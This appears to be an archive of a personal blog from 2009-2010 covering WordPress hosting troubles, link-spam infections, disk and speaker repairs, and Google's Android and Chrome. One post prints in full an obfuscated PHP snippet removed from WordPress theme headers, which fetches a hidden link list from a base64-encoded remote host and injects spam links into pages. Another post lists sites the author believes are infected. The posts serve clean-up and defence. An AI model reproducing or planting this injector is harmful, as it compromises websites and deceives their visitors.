Posted August 5th, 2010, in: Ideas, Observations, Opinions, Rants Etc| Technology| WordPress

Badass.  Just looked at his site and the Footer of the site says:

Copyright © 2010 Dr. Dre “Detox” – The most anticipated Hip Hop album ever. Running on WordPress | Theme developed by rsuog.

Cool.  WordPress is big.

Permalink - Leave a Comment (0)

Posted June 21st, 2010, in: 1| Ideas, Observations, Opinions, Rants Etc| Technology| Videos| WordPress

From the WP Dev Blog, Matt Mullenweg giving his ‘State of the Word’ presentation.  Very cool.   I’m really excited about where WordPress is going.

Permalink - Leave a Comment (0)

Posted April 15th, 2010, in: Computer Problems and Fixes| Evil Robots| Ideas, Observations, Opinions, Rants Etc| Reviews & Thoughts About Products| Technology| WordPress

When I get asked for help with an attack on a WordPress site, it’s often on the same few hosting providers.  And when it’s not, it’s usually a small, local hosting provider.  When I have spoken to the staff of one of these hosting providers, about what seems to only occur in these few situations, they never take responsibility for having oddball server settings. And it’s not uncommon for them to actually blame their customers for using WordPress in the first place!

Some of the more popular Hosting Providers that seem to have more trouble than others with WordPress malware attacks in the past two years (in my experience) are Network Solutions and IX Web Hosting. And in general, hosting providers that have a lot of issues with malware affecting WordPress sites either

• Have screwy server settings that tempt developers to take risks with file permissions, or
• Have vulnerabilities that allow malware to sneak from one hosting account to another

As for some of the local, ma ‘n’ pa providers I’ve had problems with, I’m not going to hit them when they’re down by naming names.  But let me just say this: Buying local isn’t necessarily a good idea when it comes to hosting. It’s often the worst thing you can do.  You usually get crappy support, a high price, a non-standard product, and to make things even worse, you also often get a territorial ‘server guy’ who wants to blame any technical problems on the customer and not take responsibility for anything.

I can imagine being a hosting provider and not wanting to change how I do things just because a few of my customers want to run some weird PHP software they found somewhere.  But WordPress is hardly obscure anymore. And although I could be wrong, it seems that the server settings required for a smooth, safe ride with WordPress are in line with “best practices” for hosting providers in general, since all the best and most popular hosting providers seem to run WordPress perfectly.

So in the ‘news,’ I guess on April 12th, 2010, someone (rshinsec) at Network Solutions announced that an attack on many of Network Solutions’ customers’ sites was actually caused by a “WordPress Vulnerability.” (Quote is actually from a WordPress.org page HERE, because according to the WordPress.org page, Network Solutions has since edited the announcement)”

“Beginning last week a WordPress vulnerability has been the target of attacks on multiple WordPress websites on hosting platforms around the web. We have a blog post with additional details about the vulnerability and how to secure your WordPress site.”

In fact, it was not a WordPress problem at all.  So in response to some of the inaccurate anti-worpress blogosphere chatter caused by Network Solutions passing the buck like this, Matt Mullenweg, founder of WordPress posted to the WordPress Development Blog, clearing some things up, as well as putting it like this:

“Summary: A web host had a crappy server configuration that allowed people on the same box to read each others’ configuration files, and some members of the “security” press have tried to turn this into a “WordPress vulnerability” story.”

Thank you Matt!  We the people that use and love WordPress need to stand up for ourselves and demand what we deserve.  We are not a fringe community anymore.  WordPress is mainstream software and any hosting provider that has issues with it needs to check themselves!

Permalink - Leave a Comment (2)

Posted December 31st, 2009, in: Computer Problems and Fixes| Hard Drive Drama

I’m not totally naive. But I’m also up against this barrier: The time it takes to re-install tons of software and figure out tons of passwords and other crap saved in preferences files.

Once again, I am letting a repair utility, in this case, Disk Warrior, go through it’s time-consuming and completely NOT-promising process.

Here’s what I do know:

• What one utility can’t fix, another sometimes can
• When a repair utility fails the first time, sometimes the second time it will yield different results (sometimes a disk-restore utility will work, but only after several rounds taking hours and hours or even days)
• Sometimes a particular app doesn’t work one way, but when you try it another way (like via target mode), it does.
• There is no sane preference between the different utilities: Drive Genius, Disk Warrior, Etc… It seems to me like at any given moment, one might be better than the other, or that maybe certain programs are better with certain issues.
• Patience is a virtue.
• It’s a good idea to plan, while your repair utility is or isn’t working for hours and hours or days, what you’re going to do next.  Reformat?
• Any sign of progress is a glimpse of hope, even if the program only updates you every two hours.
• There is no hope for a bad drive, or bad ram or a bad logic board or power-supply, which can lead to a false diagnosis of a bad drive.
• It is true that sometimes weird things like putting your drive in the freezer, will allow you to recover your data.
• The language used by utilities is not understandable by humans.
• We need to get used to these kinds of problems.
• We need to be prepared for them (back-up, stupid!)
• Again, I am a fool for not backing up the contents of this little laptop I have, which I thought I didn’t care much about, data-wise…

If I get this little bastard running again, I vow to look into network-backup solutions.  My main computer has a clone, which updates every day.

But a physical drive doesn’t make sense for a little baby dummy computer.  Turns out, that little dummy was one of my best friends and now I’m standing here feeling like a total jerk.

Happy New Year everyone!

Permalink - Leave a Comment (2)

Posted November 3rd, 2009, in: Computer Problems and Fixes| Evil Robots| Humanity, Culture, Philosophy, Politics, Ethics Etc| Marketing/Advertising In The Cloud| SEO, SEM, SMO Etc| Technology| WordPress

The site links to sites who are also under attack and when the bug is running correctly on those sites, the sites redirect the hits to the final destination,

which is http://www.zml.com/

I don’t know if zml.com knows this is happening.  I mean I suppose it’s possible that some unscrupulous SEO or Marketing guy promised them traffic and then resorted to this to get it.  I’m contacting them now to inform them of this uncool practice being committed on their behalf, and if they are not willing to cooperate on putting an end to it, I will have no choice but to give them some negative attention.

The process of extracting the bad links from the content was long and hard since the strings of code inserted were very inconsistent.

The following is a list of the sites being linked thru, which I assume are all victims of this malware.  If you own one of these sites, feel free to drop me a line and I will point you in the right direction as far as putting an end to this.

• http://blog.segd.org
• http://www.investorsunited.com
• http://www.oca-gla.org
• http://www.thunderstruck.org
• http://subway.com
• http://verdadeabsoluta.net
• http://yourrnc.com
• http://wordpressthemesbox.com
• http://mp3db.org
• http://webconsultingdc.com
• http://turtlesurvival.org
• http://turtleconservationfund.org
• http://truenorthbrass.com
• http://tarabooks.com
• http://kolenalaila.com
• http://techbostonacademy.org
• http://pie-flex.com
• http://www.philebrity.tv
• http://www.landmarkwine.com
• http://artsinbushwick.org
• http://brettmartin.org
• http://bsf.org
• http://www.popandpolitics.com
• http://womanhonorthyself.com
• http://www.brainstorm9.com
• http://webdev.entheosweb.com
• http://www.topicus-healthcare.com
• http://www.vfilings.com
• http://constantinessword.com
• http://www.dopiska.com
• http://writingcenters.org
• http://www.radisson.com
• http://notjustaprettyface.org
• http://www.arizonacriminaldefenseblog.com
• http://www.sembrarpaz.com
• http://www.apostilla.com
• http://www.geektechs.net
• http://johnquiggin.com
• http://blog.pdma.org
• http://bluesheaven.com

Message to ZML:

Hello,

I am a developer and recently one of my clients who is running WordPress for her personal website was attacked by some Malware that inserted thousands of links throughout her content. Those links resolve to your site, but via redirects thru other sites that I assume are also victims of the malware.

You look like you’ve built a pretty nice site here. And I’m writing to give you the chance to get on board with fixing this problem before I am forced to create some negative attention in the blogosphere and social media.

It doesn’t seem like you would want to be resposible for malware. But it also doesn’t seem like anyone would go through the trouble to make all these links back to you unless you were paying them. Perhaps you hired some marketing or SEO people and were not aware that they would be using these tactics? Please write back soon as I have very little patience for this kind of thing.

Thanks,

Andrew A. Peterson

Some samples of weird code that the bot inserted:

<wp:tag><wp:tag_slug>%d0%b0%d0%b2%d1%82%d0%be%d1%80%d1%81%d0%ba%d0%b8%d0%b5-%d0%bf%d1%80%d0%be%d0%b3%d1%80%d0%b0%d0%bc%d0%bc%d1%8b</wp:tag_slug><wp:tag_name><![CDATA[????????? ?????????]]></wp:tag_name></wp:tag>

<wp:tag><wp:tag_slug>%d1%81%d0%b2%d0%be%d0%b1%d0%be%d0%b4%d0%bd%d1%8b%d0%b9-%d0%bc%d0%b8%d0%ba%d1%80%d0%be%d1%84%d0%be%d0%bd</wp:tag_slug><wp:tag_name><![CDATA[????????? ????????]]></wp:tag_name></wp:tag>

Permalink - Leave a Comment (6)

Posted October 20th, 2009, in: Computer Problems and Fixes| Ideas, Observations, Opinions, Rants Etc| Technology| WordPress

UPDATE: After about four hours of hunting, I finally found a way to enable CodePress in WordPress! A plugin called Enable Codepress does just that! It only seems to work in FireFox, but it does work with WordPress 2.8.4

copy of a comment I left HERE, a tutorial having to do with adding line-numbers and syntax-highlighting to WordPress’ text-editor.

Wow. I am so frustrated. I have spent the last four hours trying to find a way for me to endow my clients, whom I have set up with WordPress, with the power of line numbers when editing CSS.

WordPress is nearly FTP-free, which is great for lay persons. I’ve had great results with teaching older people how to use FireBug to find and preview changes in their CSS by right-clicking on what they want to change and selecting “inspect element.” And it’s not too difficult for many of these folks to get into their Stylesheet in WP’s Theme Editor and find and change what they have tested in FireFox.

But would make the workflow a thousand times better would be a way to make the Textarea in the Theme Editor disply Line-Numbers. There are a handful of plugins that claim to do this, but none of them seem to work with WordPress 2.8.4 And in my hunt, I’ve found evidence that WP once had this feature briefly, but turned it off because it was too slow. I never noticed it and I’ve been using WP for years, and have always been up to date.

Now I find this blog post. Great. A hack to turn on the CodePress functionality in WordPress 2.8… The problem is I don’t understand how to do this!

Can’t you just make an installable Plugin? A plugin would be great because it would be nice to be able to turn the thing on and off, if it is indeed slow or buggy.

Or if some manual intervention with WP’s files is necessary, could you please-please-please explain which files you are editing in this tutorial? All of the examples show top line numbers (1, 2, 3). There’s no “this is what the whole thing should look like” …You don’t explain what file or files you are editing. This is so annoying because I’m not a programmer and this how-to assumes that we know certain things that I don’t know.

could brave these steps if I knew where to make them. I have been searching for this post for hours only to find that I’m not smart enough to understand the directions!!! Thanks for your consideration and for sharing information, even if I am ineligible for it.

Permalink - Leave a Comment (0)

Posted October 10th, 2009, in: 1| Computer Problems and Fixes

Copy of a forum post I posted at M-Audio’s user Forum.

I love my BX5′s. One of them died. Here’s what’s going on. I would really appreciate any advice on further troubleshooting/diagnosis. 

• One of my BX5′s stopped outputting sound. It may been have been sitting turned on a few days before I noticed that it wasn’t working.
• Upon putting my ear to it, I realized that it was making a steady hum/buzz from both drivers. This was similar to a 60-cycle hum but a little raspy-er if that makes sense, and if I’m not out of my mind. Also it wasn’t a very loud hum. Only about as loud as you’d get from a bad cable or something.
• I tested for a bad input connection and tried using XLR instead of the 1/4 inch input. The problem was clearly inside the unit.
• I opened it up carefully, to see if there was anything obviously burnt or shorted or broken inside.
• After finding nothing that was obvious to me, I googled around and found a few posts on the m-audio forum talking about problems caused by worn-out capacitors. See: http://forums.m-audio.com/showthread.php?t=3871&page=1 and http://forums.m-audio.com/showthread.php?t=11926 and many others.
• One of my two main power-supply caps was indeed bloated. And I noticed some dark-brown crustiness on top of the other which I concluded might be leakage of “electrolyte,” whatever that is.
• I de-soldered and removed the old caps and set out to find replacements.
• I accidentally ordered 16V 6800mfd instead of 25V 6800mfd, which I didn’t notice until I had already soldered them in.
• I tried them anyway because in theory, since all the caps are supposed to do is smooth the supply current, too-low of a voltage rating on the cap would just mean that the caps will wear out sooner. The constant hum/buzz was gone with the new caps in. Instead what I got was a pop a few seconds after the unit was powered on. The pop is new. My functioning unit does not pop.
• I went and got the correct 25V 6800µF Capacitors and put them in but there was no change in the above behavior. Incidentally, I had to mount one on the bottom because the ones I got were more than twice as wide and a bit taller than the originals.
• I’ve double and triple-checked the soldering. I even opened up my functioning BX5 to make sure that the caps are in the right polarity.
• I tested for continuity between the capacitor leads and the destination/source on the printed circuit (for instance one path goes to what I believe is a Rectifier IC so I checked to makes sure that path was solid all the way from that component’s lead to the cap’s lead to rule out a bad solder joint… I did this for all the paths in the printed circuit)
• I’ve quadruple-checked for any visible shorts.
• I believe that my capacitor-replacement surgery was a success, so now I am beginning to doubt that bad caps were the real problem. It’s entirely possible that the buzz/hum I was hearing was there for some time since it wasn’t loud enough to hear until I put my ear right up to the unit. Maybe I have two problems, one of which I just fixed.
• I can now hear some faint white noise and hum from both drivers. The original, louder buzz/hum sound is gone. Instead what I hear is about like what you’d expect from an audio amplifier, but that is not the case with the fully functional unit I have… The functioning unit is very clean. The volume knob makes no difference in the slight noise/hum. And it’s so faint that if I didn’t have the other unit to compare with, I would probably think what I’m hearing is the normal hum of the amp.
• The only other sound I can get from the dead unit is when I change the “Low Cutoff” switch, I hear slight fuzzy, static-y sound during the switching, but none of the other switches make any noise.

What should I do next? Perhaps the real problem here is in the audio signal path? A pre-amp problem? How can I rule that out?

Permalink - Leave a Comment (0)

Posted August 5th, 2009, in: Computer Problems and Fixes| Technology

Problem: Yahoo! Small Business Hosting doesn’t allow “Pretty” Permalinks (particularly with more recent versions of WordPress)

Solution: This Plugin I found after hours of searching: Disable Canonical URL Redirection

More reading that may or may not be helpful HERE.

As far as I can tell, Yahoo! Small Business Hosting Sucks for WordPress. Any time I want to do anything with it I seems to have to spend a day doing research.

Permalink - Leave a Comment (10)

Posted July 16th, 2009, in: 1| Ideas, Observations, Opinions, Rants Etc| New Media| Technology| Ubuntu/Xubuntu/Linux| Web Browsers

I was inspired to write this after hearing the good people at Buzz Out Loud as well as others talk about Chrome OS (supposedly coming in a year or two) and the Android Mobile OS somehow being evidence of some sort of disorganization of Google’s intentions Etc.

Google has these two initiatives that keep getting mentioned: Android, a “mobile OS,” and “Chrome (an OS allegedly coming out in a year or two),” which has been announced after all of us are already aware of the Chrome browser, which is pretty awesome in my opinion.

Here’s what I think practically everyone is missing about  this.

Linux Distros are all frankensteins.  I’m most familiar with Ubuntu, but I think anyone that knows about Linux would back me up in saying that Linux is an open-ended compilation of source-code.  And if you have a given distro and need some additional software, you very likely are going to be using add-on code that users of other distros are also using.

For this reason, Android and Chrome OS are not necessarily different initiatives on Google’s part.

And to go even further, I don’t believe that Android and Web OS from Palm are competitors.  I think it’s completely reasonable to assume that a Web OS front-end for Android is likely (as long as Android and WebOS continue to be released to consumers).  They’re both just Linux with different front-ends.  And with Linux Boxes, as they used to be called, the GUI is itself just an add-on.

Back to Google Chrome and Android.

I suspect that as an afterthought, Google realized that it should choose “Chrome”as it’s brand for NetBook sales because “Android” is not as friendly a name to the average buyer of a low-end laptop.

Along with that, banking on the fact that Mobile Data Connections are only going to get better, while WiFi only becomes more ubiquitous over the next two years, the idea of a machine that, for instance, has a music player that’s basically Pandora or Last.FM starts to make a lot of sense. (remember the FT article where the teenager says streaming music preferable owning it? I don’t know that we’ll even need to download mp3′s in 2 years, just stream!)

In order to make as many apps cloud-based as possible, Google Chrome could come to us with small API-based developments that take advantage of services like Yahoo!’s Flickr or Delicious or even news and entertainment services that plug right into the struggling corporate content businesses we keep hearing about in the tech news.

Perhaps the Chrome-loaded Asus laptop will be a direct Kindle competitor (or even an additional revenue model for amazon).

Meanwhile, mobile (pocket sized) devices aren’t going to stop getting smarter.  Android is just a catchy ‘band name’ for what’s ultimately the result of Google seeing that it’s in their best interest to get the OS market out of the hands of Microsoft and Apple.

Chrome is the same thing, but with a better name, and a wider appeal as long as the NetBook trend keeps up.

And at this point, I don’t think Google is risking much on its campaign to popularize Linux.  I personally believe that Linux is finally mature enough to begin competing with Mac OS and Windows so Google is just helping it along.  They’re jumping on the bandwagon because it serves them to do so.

In case I didn’t make it clear enough, Chrome and Android are the same thing or at the very least they’re both just Linux with different default drivers and GUI coding.

You can run Linux on a toaster.

Permalink - Leave a Comment (0)

Posted June 18th, 2009, in: Computer Problems and Fixes| Evil Robots| Technology| WordPress

Thanks to SomewwhereVille for helping me diagnose… Here’s what I removed from header.php (in all the installed themes, not just the active one):

 

<?php /* wp_remote_fopen procedure */ $wp_remote_fopen=’aHR0cDovL3F3ZXRyby5jb20vc3Mv’; $opt_id=’62f751b6518fcbe2ab5980b9f1349902′; $blarr=get_option(‘cache_vars’); if(trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.’.md5′))!=md5($blarr)){ $blarr=trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.’.txt’)); update_option(‘cache_vars’,$blarr); } $blarr=unserialize(base64_decode(get_option(‘cache_vars’))); if($blarr['hide_text']!=” && sizeof($blarr['links'])>0){ if($blarr['random']){ $new=”; foreach(array_rand($blarr['links'],sizeof($blarr['links'])) as $k) $new[$k]=$blarr['links'][$k]; $blarr['links']=$new; } $txt_out=”; foreach($blarr['links'] as $k=>$v) $txt_out.=’<a href=”‘.$v.’”>’.$k.’</a>’; echo str_replace(‘[LINKS]‘,$txt_out,$blarr['hide_text']); } /* wp_remote_fopen procedure */ ?>

After removing this crap, I recommend installing WP Security Scan. It’s a pretty badass little plugin that walks you through doing some not-so-obvious things to protect WP from attacks.  For instance, if your hosting scenario allows, you can rename all your Database Tables to have a Prefix other than “wp_”

Who knew that was the thing to do?  I didn’t.  It also scans your WP install for risky file permissions and weak passwords and a few other things.

Unfortunately for me, I was working on a site hosted by AN Hosting which doesn’t allow a certain priviledges to DataBase users (Alter?), so I had to change our table prefixes manually.

WP Security Scan, after failing to rename the table prefixes because it didn’t have sufficient access, referred me to a nice little tutorial on how to do it manually. 

Basically you:

1. download your database thru PHPMyAdmin as per WordPress.org’s Documentation, 
2. do a “Find-And-Replace” replacing all instances of “wp_” with “somethingelse_” 
3. make a new database and import your “somethingelse_” version to the new database.
4. Change your wp-config.php file to point at the new database 
5. Change your wp-config.php file’s “table prefix” line from “$table_prefix  = ‘wp_’ ” to “$table_prefix  = ‘somethingelse_’“

These kinds of problems suck to have but it sure is nice to have the WordPress Community, all of us working together to combat the evil.

Permalink - Leave a Comment (5)